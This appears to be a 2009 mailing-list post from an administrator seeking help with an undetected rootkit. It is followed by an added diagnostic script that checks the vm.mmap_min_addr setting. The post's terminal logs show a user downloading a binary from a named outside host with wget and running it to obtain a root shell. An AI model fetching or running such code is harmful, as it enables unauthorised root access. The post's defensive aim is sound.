
rootkit not found by rkhunter



  I am running debian testing, 2.6.30 kernel.

  I have a rootkit installed on a bunch of machines that rkhunter
  does not find. This appears after infection with SHV4 / SHV5,
  which rkhunter found.

  Here it works to allow a non-root user to become root

krichel@fricka:~$ mkdir a
krichel@fricka:~$ cd a
krichel@fricka:~/a$ ls -l
total 0
krichel@fricka:~/a$  wget webmail.facill.com.br/a
--2009-10-04 07:47:42--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       6.88K/s   in 1.0s    

2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]

krichel@fricka:~/a$ chmod 777 a
krichel@fricka:~/a$ ./a
root@fricka:~/a# 

  Here is a situation where it does not work 

krichel@chichek:~$ mkdir a
krichel@chichek:~$ cd a
krichel@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       37.8K/s   in 0.2s    

2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]

krichel@chichek:~/a$ chmod 777 a
krichel@chichek:~/a$ ./a
mmap: Permission denied


  Does anybody here know how to delete this kit?


  Cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel
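The host where the binary fails reports `mmap: Permission denied`. That message is consistent with the kernel refusing a low-address mapping because of the `vm.mmap_min_addr` sysctl, but that is an assumption here: the post does not say which address the binary tried to map, and the two hosts are not compared. The script below is an added example, not something from the original post; it only reads and reports the setting so an administrator can compare the working and non-working hosts, and it accepts a file path so it can be exercised against a constructed value instead of the live `/proc` entry.

```shell
#!/bin/sh
# Added example, not part of the original post. Assumption: the
# "mmap: Permission denied" failure on the second host comes from
# vm.mmap_min_addr refusing a low-address mapping. This script only
# reads and reports the setting; it changes nothing on the host.

# Print the value stored in a mmap_min_addr file. Default: the live sysctl.
read_mmap_min_addr() {
    f="${1:-/proc/sys/vm/mmap_min_addr}"
    [ -r "$f" ] || { echo "cannot read $f" >&2; return 2; }
    tr -d '[:space:]' < "$f"
}

# Return 0 when the value in the file is at least MIN (default 65536,
# the value most distributions ship), 1 when it is lower, 2 on error.
check_mmap_min_addr() {
    val=$(read_mmap_min_addr "$1") || return 2
    min="${2:-65536}"
    case "$val" in
        ''|*[!0-9]*) echo "unexpected value: '$val'" >&2; return 2 ;;
    esac
    if [ "$val" -ge "$min" ]; then
        echo "mmap_min_addr=$val (>= $min): low-address mappings are refused"
        return 0
    else
        echo "mmap_min_addr=$val (< $min): low-address mappings are allowed"
        return 1
    fi
}

# Stand-alone use: report this host's live setting. The check runs inside
# an "if" so a low value is reported rather than aborting under "set -e".
if ! check_mmap_min_addr; then
    echo "consider raising it, e.g. sysctl -w vm.mmap_min_addr=65536" >&2
fi
```

Run it on both hosts (`sh check.sh`) and compare the two lines; a host that prints a value of 0 permits the mapping the other one refuses. A matching value on both hosts would mean the difference lies elsewhere and the assumption above is wrong.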


